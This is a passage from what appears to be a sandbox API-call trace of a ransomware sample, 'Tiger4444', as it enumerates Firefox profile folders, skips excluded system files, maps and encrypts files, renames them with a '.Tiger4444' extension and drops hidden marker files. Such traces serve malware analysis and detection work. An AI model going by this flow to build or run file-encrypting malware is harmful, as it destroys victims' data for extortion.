QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14273990170) returned 1 [0051.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0051.287] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0051.287] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.287] CloseHandle (hObject=0x2c8) returned 1 [0051.287] CloseHandle (hObject=0x260) returned 1 [0051.287] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.Tiger4444") returned 134 [0051.287] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.tiger4444"), dwFlags=0x1) returned 1 [0051.288] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x826703d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xf722f14, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="Tiger4444.exe") returned -1 [0051.288] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="windows") returned -1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="bootmgr") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="pagefile.sys") returned -1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="boot") returned 1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="ids.txt") returned -1 [0051.288] lstrcmpiW (lpString1="idb", lpString2="NTUSER.DAT") returned -1 [0051.288] lstrcpyW (in: lpString1=0x30aeb88, lpString2="idb" | out: lpString1="idb") returned="idb" [0051.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86d00 [0051.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe8) returned 0xc81d40 [0051.288] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86d08 | out: ListHead=0xc66828, ListEntry=0xc86d08) returned 0xc86f28 [0051.288] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x826703d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xf722f14, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0051.288] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.288] lstrcpyW (in: lpString1=0x30aeb88, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.288] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.289] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.289] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.289] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.290] CloseHandle (hObject=0x260) returned 1 [0051.290] CloseHandle (hObject=0x2ac) returned 1 [0051.290] GetCurrentThreadId () returned 0xfa8 [0051.290] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86d08 [0051.290] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" [0051.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86d00 | out: hHeap=0xc50000) returned 1 [0051.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb" [0051.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\" [0051.291] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3" [0051.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.308] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.311] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.312] CloseHandle (hObject=0x2ac) returned 1 [0051.313] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 115 [0051.313] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.313] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xf722f14, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x839a3c1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0051.313] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.313] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.313] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.313] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.313] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41ea601c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xf722f14, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x839a3c1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.313] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.313] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.313] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.313] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.313] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.313] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x839a3c1b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x839a3c1b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x839a3c1b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.313] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.313] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.313] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x421d9eea, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x421d9eea, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x421d9eea, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.files", cAlternateFileName="818200~1.FIL")) returned 1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="Tiger4444.exe") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2=".") returned 1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="..") returned 1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="windows") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="bootmgr") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="pagefile.sys") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="boot") returned -1 [0051.313] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="ids.txt") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.files", lpString2="NTUSER.DAT") returned -1 [0051.314] lstrcpyW (in: lpString1=0x30aeb90, lpString2="818200132aebmoouht.files" | out: lpString1="818200132aebmoouht.files") returned="818200132aebmoouht.files" [0051.314] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86c20 [0051.314] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x11a) returned 0xc81d40 [0051.314] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86c28 | out: ListHead=0xc66828, ListEntry=0xc86c28) returned 0xc86f28 [0051.314] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ea7396, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea7396, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x971d956, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Tiger4444.exe") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2=".") returned 1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="..") returned 1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="windows") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="bootmgr") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="pagefile.sys") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="boot") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ids.txt") returned -1 [0051.314] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="NTUSER.DAT") returned -1 [0051.314] lstrcpyW (in: lpString1=0x30aeb90, lpString2="818200132aebmoouht.sqlite" | out: lpString1="818200132aebmoouht.sqlite") returned="818200132aebmoouht.sqlite" [0051.314] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", dwFileAttributes=0x0) returned 1 [0051.314] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0051.314] lstrlenW (lpString="Tiger4444") returned 9 [0051.314] lstrcmpiW (lpString1="ht.sqlite", lpString2="Tiger4444") returned -1 [0051.314] lstrlenW (lpString=".dll") returned 4 [0051.314] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.314] lstrlenW (lpString=".lnk") returned 4 [0051.314] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.314] lstrlenW (lpString=".ini") returned 4 [0051.314] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.314] lstrlenW (lpString=".sys") returned 4 [0051.314] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.314] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.315] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.315] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14276784434) returned 1 [0051.315] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=122880) returned 1 [0051.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0051.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0051.315] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1e300, lpName=0x0) returned 0x2c8 [0051.316] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e300) returned 0xbe0000 [0051.340] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81e68 [0051.340] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81e68 | out: hHeap=0xc50000) returned 1 [0051.340] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.340] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0051.340] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14279342348) returned 1 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0051.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0051.340] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.342] CloseHandle (hObject=0x2c8) returned 1 [0051.342] CloseHandle (hObject=0x260) returned 1 [0051.342] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Tiger4444") returned 151 [0051.342] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0051.342] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ea7396, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea7396, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x971d956, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0051.342] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0051.342] lstrcpyW (in: lpString1=0x30aeb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.343] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.343] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.344] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.344] CloseHandle (hObject=0x260) returned 1 [0051.344] CloseHandle (hObject=0x2ac) returned 1 [0051.344] GetCurrentThreadId () returned 0xfa8 [0051.344] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86c28 [0051.344] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0051.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86c20 | out: hHeap=0xc50000) returned 1 [0051.344] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0051.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\" [0051.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3" [0051.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.346] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.349] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.350] CloseHandle (hObject=0x2ac) returned 1 [0051.351] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 140 [0051.351] lstrcatW (in: lpString1="", 